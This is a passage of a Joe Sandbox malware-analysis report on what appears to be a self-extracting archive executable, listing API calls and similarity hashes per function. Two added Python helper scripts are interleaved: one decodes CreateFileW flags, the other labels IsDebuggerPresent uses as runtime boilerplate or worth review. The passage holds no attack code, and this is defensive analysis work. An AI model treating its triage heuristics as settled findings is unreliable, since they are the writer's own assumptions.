Similarity
• API ID: Item$Time$Text$_swprintf$FileSystem$FormatMessageSend$Find$CloseDateDialogFirstFocusInfoLocalLocaleNumberSpecificWindow__vswprintf_c_l
• String ID: %s %s$REPLACEFILEDLG
• API String ID: 3464475507-439456425
• Opcode ID: 7092ac17cde970d214bf5907a1cbeb8208b5a61c749ed7d6b40c6a66e89a20a5
• Instruction ID: e81b183b8d0e58c9350c32a43939dd7af819c9127b086dbf8189ce9554db22ff
• Opcode Fuzzy Hash: 7092ac17cde970d214bf5907a1cbeb8208b5a61c749ed7d6b40c6a66e89a20a5
• Instruction Fuzzy Hash: AE71B572548304BBE331EBB4ED49FFB77ACEB8A700F040829FA49D6091D775A9059762
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 00A27AB4
• _wcslen.LIBCMT ref: 00A27B1D
• _wcslen.LIBCMT ref: 00A27B8E
  • Part of subcall function 00A28704: GetCurrentProcess.KERNEL32(00000020,?), ref: 00A28713
  • Part of subcall function 00A28704: OpenProcessToken.ADVAPI32(00000000), ref: 00A2871A
  • Part of subcall function 00A28704: GetLastError.KERNEL32 ref: 00A28759
  • Part of subcall function 00A28704: CloseHandle.KERNEL32(?), ref: 00A28768
  • Part of subcall function 00A2B470: DeleteFileW.KERNELBASE(?,00000000,?,00A2A438,?,?,?,?,00A2892B,?,?,?,00A5380F,000000FF), ref: 00A2B481
  • Part of subcall function 00A2B470: DeleteFileW.KERNEL32(?,?,?,00000800,?,00A2A438,?,?,?,?,00A2892B,?,?,?,00A5380F,000000FF), ref: 00A2B4AF
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00A27C43
• CloseHandle.KERNEL32(00000000), ref: 00A27C5F
• CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00A27DAB
  • Part of subcall function 00A2B032: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00A27ED0,?,?,?,00000000), ref: 00A2B04C
  • Part of subcall function 00A2B032: SetFileTime.KERNELBASE(?,?,?,?), ref: 00A2B100
  • Part of subcall function 00A2A880: FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00A2A83D,?,?,?,?,?,00A5380F,000000FF), ref: 00A2A89B
  • Part of subcall function 00A2B8E6: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00A2B5B5,?,?,?,00A2B405,?,00000001,00000000,?,?), ref: 00A2B8FA
  • Part of subcall function 00A2B8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00A2B5B5,?,?,?,00A2B405,?,00000001,00000000,?,?), ref: 00A2B92B
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: File$Close$AttributesCreateDeleteHandleProcess_wcslen$BuffersChangeCurrentErrorFindFlushH_prologLastNotificationOpenTimeToken
• String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
• API String ID: 1504485742-3508440684
• Opcode ID: 092b01afa55759068aa8535b387eafe7917b19e85c65ee94aef8960862258c2e
• Instruction ID: ab7c238432d2b662f2cfe29e943b1380dcd378f9304202abf06d33a7051d91f8
• Opcode Fuzzy Hash: 092b01afa55759068aa8535b387eafe7917b19e85c65ee94aef8960862258c2e
• Instruction Fuzzy Hash: 8AC1E471904264ABDB11DB68DD81FEEB3A8BF04314F104566F546E7282D734AA84CBB1
Uniqueness
• Uniqueness Score: -1.00%
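The report prints the CreateFileW arguments of the function above as raw hex. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses lines in the report's `Name.MODULE(args), ref: ADDR` format (bullet and "Part of subcall function" prefixes included) and decodes the access mask, creation disposition and flags with the Windows SDK constant values. The two input lines are the CreateFileW calls listed for this function, copied from the report; every other name in the block is the example's own. Decoded, the first open is GENERIC_WRITE / CREATE_NEW / FILE_ATTRIBUTE_NORMAL and the second is GENERIC_READ|GENERIC_WRITE / OPEN_EXISTING with 0x02200000 = FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT, i.e. the reparse point itself is opened rather than its target and backup semantics are requested, which is the combination the SeRestorePrivilege and SeCreateSymbolicLinkPrivilege strings and the SetFileTime / SetFileAttributesW calls in the same function go with.

```python
"""Parse Joe Sandbox IDA-plugin API lines and decode CreateFileW's constant arguments.

Added example for reading the function listing above; it is not part of the
Joe Sandbox report. REPORT_LINES are copied from the report; the constant
values are the Windows SDK definitions (winnt.h / fileapi.h).
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# One API reference line in the report:  Name.MODULE(arg,arg,...), ref: ADDR
# The argument list is optional ("GetLastError.KERNEL32 ref: 00A28759").
_API_RE = re.compile(
    r"^(?P<name>[\w@]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
_SUBCALL_RE = re.compile(r"^Part of subcall function [0-9A-Fa-f]+:\s*")

# Sample input: the two CreateFileW calls listed for the function above (copied from the report).
REPORT_LINES = [
    "• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00A27C43",
    "• CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00A27DAB",
]

# Windows SDK constants (exact values; the subset relevant to these calls).
GENERIC_ACCESS = {"GENERIC_READ": 0x80000000, "GENERIC_WRITE": 0x40000000,
                  "GENERIC_EXECUTE": 0x20000000, "GENERIC_ALL": 0x10000000}
SHARE_MODE = {"FILE_SHARE_READ": 0x1, "FILE_SHARE_WRITE": 0x2, "FILE_SHARE_DELETE": 0x4}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FLAGS_AND_ATTRS = {
    "FILE_FLAG_WRITE_THROUGH": 0x80000000, "FILE_FLAG_OVERLAPPED": 0x40000000,
    "FILE_FLAG_NO_BUFFERING": 0x20000000, "FILE_FLAG_RANDOM_ACCESS": 0x10000000,
    "FILE_FLAG_SEQUENTIAL_SCAN": 0x08000000, "FILE_FLAG_DELETE_ON_CLOSE": 0x04000000,
    "FILE_FLAG_BACKUP_SEMANTICS": 0x02000000, "FILE_FLAG_OPEN_REPARSE_POINT": 0x00200000,
    "FILE_ATTRIBUTE_TEMPORARY": 0x100, "FILE_ATTRIBUTE_NORMAL": 0x80,
    "FILE_ATTRIBUTE_SYSTEM": 0x4, "FILE_ATTRIBUTE_HIDDEN": 0x2, "FILE_ATTRIBUTE_READONLY": 0x1,
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[Optional[int]]   # None where the report prints '?' (value not recovered)
    ref: int                    # address of the call instruction


def parse_api_line(line: str) -> ApiCall:
    """Parse one '• Name.MODULE(args), ref: ADDR' line; '?' arguments become None."""
    text = _SUBCALL_RE.sub("", line.strip().lstrip("•").strip())
    m = _API_RE.match(text)
    if not m:
        raise ValueError(f"not an API reference line: {line!r}")
    raw = m.group("args")
    args = [] if not raw else [None if a == "?" else int(a, 16) for a in raw.split(",")]
    return ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16))


def bit_names(value: int, table: Dict[str, int]) -> List[str]:
    """Name each bit of a mask; leftover bits are reported as hex so nothing is silently dropped."""
    names, rest = [], value
    for name, bit in table.items():
        if rest & bit == bit:
            names.append(name)
            rest &= ~bit
    if rest:
        names.append(f"0x{rest:08X}")
    return names


def decode_create_file(call: ApiCall) -> Dict[str, object]:
    """Decode CreateFile(hName, dwDesiredAccess, dwShareMode, lpSA, dwCreationDisposition, dwFlags, hTemplate)."""
    if call.name not in ("CreateFileW", "CreateFileA"):
        raise ValueError(f"{call.name} is not CreateFile")
    # Values past the 7 real parameters are stack residue the plugin printed; ignore them.
    access, share, _sa, disposition, flags = call.args[1:6]
    if None in (access, share, disposition, flags):
        raise ValueError("argument value not recovered from the stack")
    return {
        "ref": f"{call.ref:08X}",
        "access": bit_names(access, GENERIC_ACCESS),
        "share": bit_names(share, SHARE_MODE),
        "disposition": DISPOSITION.get(disposition, f"0x{disposition:X}"),
        "flags": bit_names(flags, FLAGS_AND_ATTRS),
    }


def decode_report(lines: List[str]) -> List[Dict[str, object]]:
    """Decode every CreateFile line in a list of report lines."""
    return [decode_create_file(parse_api_line(line)) for line in lines]


if __name__ == "__main__":
    for decoded in decode_report(REPORT_LINES):
        print(decoded)
```

An empty share list means exclusive access (dwShareMode 0), and a decoded disposition of CREATE_NEW means the first call fails if the target already exists, which is why the DeleteFileW subcalls precede it in the listing.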

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: __floor_pentium4
                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                              • API String ID: 4168288129-2761157908
                                                                                              • Opcode ID: 3f099e5a95b6fb0b7629881655aefe117ee974a172f31e5d738e5961c904df12
                                                                                              • Instruction ID: d29f125dee26c52425b36341057708aca647a70da5f45dffe2defdc9d814da96
                                                                                              • Opcode Fuzzy Hash: 3f099e5a95b6fb0b7629881655aefe117ee974a172f31e5d738e5961c904df12
                                                                                              • Instruction Fuzzy Hash: 3BC23775E086288FDB25CF28DD407EAB7B5EB88315F1551EAD80DE7240E779AE818F40
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog_swprintf
                                                                                              • String ID: CMT$h%u$hc%u
                                                                                              • API String ID: 146138363-3282847064
                                                                                              • Opcode ID: 9700fd7ae40e1176793e5ed2324bad2ccf46e48af2107a3f9fb36650ca61ad67
                                                                                              • Instruction ID: abf669a737494707281302f431c87170c4a45ce0a2ec8c1eb06c0fe6ca4212ab
                                                                                              • Opcode Fuzzy Hash: 9700fd7ae40e1176793e5ed2324bad2ccf46e48af2107a3f9fb36650ca61ad67
                                                                                              • Instruction Fuzzy Hash: 9642F9726053A49FDF24DF38D981BD93BA5AF15300F04457DFC4A8B282DB74AA89CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00A22EBF
                                                                                              • _strlen.LIBCMT ref: 00A2348B
                                                                                                • Part of subcall function 00A31600: __EH_prolog.LIBCMT ref: 00A31605
                                                                                                • Part of subcall function 00A32ED2: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00A2CF18,00000000,?,?), ref: 00A32EEE
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A235DD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                                              • String ID: CMT
                                                                                              • API String ID: 1206968400-2756464174
                                                                                              • Opcode ID: 99e1da0325f9da59ff5304b05f3395f3d37b13834dd805b15b00a0716a943266
                                                                                              • Instruction ID: 2da37e1cee989535d918256c1a066316163dca81abca4fa70a9bd8d523811dcb
                                                                                              • Opcode Fuzzy Hash: 99e1da0325f9da59ff5304b05f3395f3d37b13834dd805b15b00a0716a943266
                                                                                              • Instruction Fuzzy Hash: 7C6238726042A48FDF29CF3CD9956E93BA1AF16304F08457EFC5A8F282DB749A45CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00A40A16
                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00A40AE2
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00A40B02
                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00A40B0C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                              • String ID:
                                                                                              • API String ID: 254469556-0
                                                                                              • Opcode ID: c76be082387f905a284a749ee197ee8e6c9380e9de10b35f34b9c4f6950cdf37
                                                                                              • Instruction ID: e4126d0b78b7857f25a80ba7cac70ae2e3019e3bb66b7b8d22dc22e7ae5bc168
                                                                                              • Opcode Fuzzy Hash: c76be082387f905a284a749ee197ee8e6c9380e9de10b35f34b9c4f6950cdf37
                                                                                              • Instruction Fuzzy Hash: 4F311A75D053189BDB10DFA4D989BCDBBB8BF08305F1042AAE50DA7250EB715AC59F44
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • VirtualQuery.KERNEL32(80000000,00A3F774,0000001C,00A3F969,00000000,?,?,?,?,?,?,?,00A3F774,00000004,00A83D24,00A3F9F9), ref: 00A3F840
                                                                                              • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00A3F774,00000004,00A83D24,00A3F9F9), ref: 00A3F85B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoQuerySystemVirtual
                                                                                              • String ID: D
                                                                                              • API String ID: 401686933-2746444292
                                                                                              • Opcode ID: 3cfd1acee8bb802ddff8165b6d7ed23534717faccd6930895cc2d9db00e1c3b3
                                                                                              • Instruction ID: 14f6f8b81fb78bc91f59c03b59a0e2e4d78eb8f025e08089b5049c30a5307ae3
                                                                                              • Opcode Fuzzy Hash: 3cfd1acee8bb802ddff8165b6d7ed23534717faccd6930895cc2d9db00e1c3b3
                                                                                              • Instruction Fuzzy Hash: B501D432A101096BCB18DF69DC05AEE7BE9AFC4329F08C234AD19D7254E634D9428680
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00A450E7
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00A450F1
                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00A450FE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                              • String ID:
                                                                                              • API String ID: 3906539128-0
                                                                                              • Opcode ID: 3fa0c49da20ab38c1a413944a58e179e8a511161aca139726d36ab1fdeeb26c7
                                                                                              • Instruction ID: 2d08391290ef47166d86daef8bf0a0dff5510a551afc13fc1448e486eff6a0fe
                                                                                              • Opcode Fuzzy Hash: 3fa0c49da20ab38c1a413944a58e179e8a511161aca139726d36ab1fdeeb26c7
                                                                                              • Instruction Fuzzy Hash: 0031B274D116189BCB21DF68D989B89BBB8BF48311F5042DAE90CA7251E7709BC58F44
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%
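The two function records above (refs 00A40A16 to 00A40B0C and 00A450E7 to 00A450FE) list IsProcessorFeaturePresent(0x17), IsDebuggerPresent, SetUnhandledExceptionFilter(NULL) and UnhandledExceptionFilter in that order. 0x17 is PF_FASTFAIL_AVAILABLE, and this exact sequence is the Visual C++ runtime's fail-fast / security-check failure reporter (__scrt_fastfail and __report_gsfailure), which is statically linked into practically every MSVC-built binary. On its own it is therefore not evidence of deliberate anti-debugging, and the "Contains functionality to check if a debugger is running (IsDebuggerPresent)" signature should be weighed against where the call sits. The Python script below is an added triage helper, not part of the Joe Sandbox report or of Joe Security's tooling: it parses records written in the report's "APIs" line format, decodes the IsProcessorFeaturePresent argument, and separates runtime boilerplate from IsDebuggerPresent uses that merit a closer look. The sample text is copied from records on this page (argument lists shortened) plus one constructed anti-debug record that does not occur in this report; the CRT_FAILFAST_APIS set and the three labels are my own assumptions for illustration.

```python
"""Triage helper for the per-function "APIs" lists of a Joe Sandbox report.

Added example; not part of the report. Separates the MSVC runtime's fail-fast
reporter (IsProcessorFeaturePresent(PF_FASTFAIL_AVAILABLE) -> IsDebuggerPresent
-> SetUnhandledExceptionFilter(NULL) -> UnhandledExceptionFilter) from other
uses of IsDebuggerPresent that deserve manual review.
"""
import re
from dataclasses import dataclass

# One API reference line in the report's "APIs" list, e.g.
#   • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00A450E7
#   • Part of subcall function 00A31600: __EH_prolog.LIBCMT ref: 00A31605
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[^.\s(]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Assumed set: APIs used by the MSVC runtime's fail-fast / GS-failure reporter.
# A record whose non-subcall APIs all lie in this set is runtime boilerplate.
CRT_FAILFAST_APIS = frozenset({
    "IsProcessorFeaturePresent", "IsDebuggerPresent",
    "SetUnhandledExceptionFilter", "UnhandledExceptionFilter",
    "GetCurrentProcess", "TerminateProcess",
})

# IsProcessorFeaturePresent() argument values from winnt.h (PF_* constants).
PROCESSOR_FEATURES = {
    0x0A: "PF_XMMI64_INSTRUCTIONS_AVAILABLE",
    0x0C: "PF_NX_ENABLED",
    0x0D: "PF_SSE3_INSTRUCTIONS_AVAILABLE",
    0x17: "PF_FASTFAIL_AVAILABLE",
}


@dataclass
class ApiRef:
    api: str
    module: str
    args: list
    ref: int
    subcall: bool = False

    def first_arg(self):
        """First argument as an int, or None when the sandbox printed '?'."""
        if self.args and self.args[0] != "?":
            return int(self.args[0], 16)
        return None


def parse_records(text):
    """Split report text into function records (each begins at an 'APIs'
    header) and return the parsed ApiRef list for each record."""
    records, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            records.append(current)
            continue
        m = API_LINE.match(line)
        if m and current is not None:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            current.append(ApiRef(m["api"], m["module"], args,
                                  int(m["ref"], 16), m["sub"] is not None))
    return records


def describe(ref):
    """Note for arguments that change what a call means; '' if nothing to say."""
    if ref.api == "IsProcessorFeaturePresent":
        v = ref.first_arg()
        return "?" if v is None else PROCESSOR_FEATURES.get(v, f"PF_{v}")
    if ref.api == "SetUnhandledExceptionFilter" and ref.first_arg() == 0:
        return "NULL filter (default handler restored before UnhandledExceptionFilter)"
    return ""


def classify(record):
    """Label a record by what its IsDebuggerPresent use most plausibly is."""
    names = {r.api for r in record if not r.subcall}
    if "IsDebuggerPresent" not in names:
        return "no-debugger-check"
    if ({"SetUnhandledExceptionFilter", "UnhandledExceptionFilter"} <= names
            and names <= CRT_FAILFAST_APIS):
        return "crt-failfast-boilerplate"
    return "review-debugger-check"


def triage(text):
    """One (label, api names, argument notes) tuple per record."""
    out = []
    for rec in parse_records(text):
        notes = [f"{r.api}: {d}" for r in rec if (d := describe(r))]
        out.append((classify(rec), [r.api for r in rec if not r.subcall], notes))
    return out


# Constructed sample: four records copied from this page (argument lists
# shortened) and one made-up anti-debug record that is NOT in the report.
SAMPLE_REPORT = """\
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00A40A16
• IsDebuggerPresent.KERNEL32 ref: 00A40AE2
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00A40B02
• UnhandledExceptionFilter.KERNEL32(?), ref: 00A40B0C
Memory Dump Source
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00A450E7
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00A450F1
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00A450FE
Memory Dump Source
APIs
• __EH_prolog.LIBCMT ref: 00A22EBF
• _strlen.LIBCMT ref: 00A2348B
  • Part of subcall function 00A31600: __EH_prolog.LIBCMT ref: 00A31605
  • Part of subcall function 00A32ED2: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF), ref: 00A32EEE
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A235DD
Memory Dump Source
APIs
• VirtualQuery.KERNEL32(80000000,00A3F774,0000001C), ref: 00A3F840
• GetSystemInfo.KERNEL32(?,?,00000000), ref: 00A3F85B
Memory Dump Source
APIs
• IsDebuggerPresent.KERNEL32 ref: 00401000
• ExitProcess.KERNEL32(00000001), ref: 00401010
Memory Dump Source
"""

if __name__ == "__main__":
    for label, apis, notes in triage(SAMPLE_REPORT):
        print(f"{label:26} {', '.join(apis)}")
        for note in notes:
            print("    " + note)
```

Only the last, constructed record comes out as "review-debugger-check"; both records from this page are labelled as runtime boilerplate, and the VirtualQuery/GetSystemInfo and LIBCMT records are reported as containing no debugger check at all. Subcall lines are parsed but excluded from classification, since they describe callees rather than the function itself.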

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d08e2bcb8369247a90beecc4ac2937ecc20121a35f50d3dd5c946701bfc99d8e
                                                                                              • Instruction ID: 30add4fd59ef5df6212bf56ac3d21e76b81238be50473bec9450b50eb0ad7848
                                                                                              • Opcode Fuzzy Hash: d08e2bcb8369247a90beecc4ac2937ecc20121a35f50d3dd5c946701bfc99d8e
                                                                                              • Instruction Fuzzy Hash: E9022B75E002199FDF14CFA9C8806ADFBF1FF88324F25816AD919E7385D731AA418B90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00A3C0B9
                                                                                              • GetNumberFormatW.KERNEL32(00000400,00000000,?,00A6072C,?,?), ref: 00A3C108
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
